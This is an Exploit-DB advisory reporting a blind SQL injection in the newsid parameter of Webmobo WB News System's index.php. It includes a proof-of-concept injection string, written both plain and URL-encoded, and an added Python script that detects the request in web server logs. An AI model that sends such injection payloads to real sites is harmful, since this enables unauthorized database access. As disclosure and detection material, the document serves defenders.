Webmobo WB News System – Blind SQL Injection

  • Author: Eyup CELIK
    Date: 2011-09-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17786/
  • # Exploit Title: Webmobo News System Blind SQL Injection
    # Date: 2011
    # Author: Eyup CELIK
    # Version: All versions
    # Tested on: All versions are vulnerable
    # Web Site: www.eyupcelik.com.tr
    
    
    ISSUE
    
    Blind SQL injection is possible through the newsid parameter of index.php when action=sendto.
    
    Vulnerable Page:
    index.php
    
    Example:
    index.php?action=sendto&newsid=<Blind SQL Injection Code>
    
    Exploit:
    index.php?action=sendto&newsid=1' and '2'='2
    
    POC:
    http://server/index.php?action=sendto&newsid=1%27%20and%20%272%27=%272
    
    
    Thanks,
    
    Eyup CELIK
    Information Technology Security Specialist
    http://www.eyupcelik.com.tr
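
For defenders reviewing web server logs, the following added example (not part of the original advisory or of the Webmobo code) flags requests to index.php with action=sendto whose decoded newsid is not a plain integer, which is how the PoC request above appears in an access log. It assumes combined-format log lines and that legitimate newsid values are numeric; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The second line is
# the PoC request from the advisory as it would appear in a log.
SAMPLE_LOG = """\
198.51.100.7 - - [05/Sep/2011:10:01:12 +0000] "GET /index.php?action=sendto&newsid=14 HTTP/1.1" 200 5120
198.51.100.9 - - [05/Sep/2011:10:02:40 +0000] "GET /index.php?action=sendto&newsid=1%27%20and%20%272%27=%272 HTTP/1.1" 200 5120
203.0.113.4 - - [05/Sep/2011:10:03:05 +0000] "GET /index.php?action=view&id=3 HTTP/1.1" 200 4300
203.0.113.4 - - [05/Sep/2011:10:04:00 +0000] "GET /index.php?action=sendto HTTP/1.1" 200 900
"""

# Client address and request target from a common/combined log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_newsid(line):
    """Return (client, decoded newsid) when the line is an action=sendto
    request whose newsid is not a plain integer, otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.endswith("/index.php"):
        return None
    # parse_qs percent-decodes values, so %27 becomes a literal quote.
    params = parse_qs(url.query, keep_blank_values=True)
    if params.get("action", [""])[-1] != "sendto":
        return None
    for value in params.get("newsid", []):
        # Assumption: a legitimate news id consists of digits only.
        if not re.fullmatch(r"\d+", value):
            return client, value
    return None

def scan(log_text):
    """Collect every suspicious (client, newsid) pair in the log text."""
    hits = []
    for line in log_text.splitlines():
        hit = suspicious_newsid(line)
        if hit:
            hits.append(hit)
    return hits

if __name__ == "__main__":
    for client, value in scan(SAMPLE_LOG):
        print(f"{client}: non-numeric newsid {value!r}")
```

The same digits-only check, applied in the application before newsid reaches the database and combined with a parameterized query, closes the issue at its source.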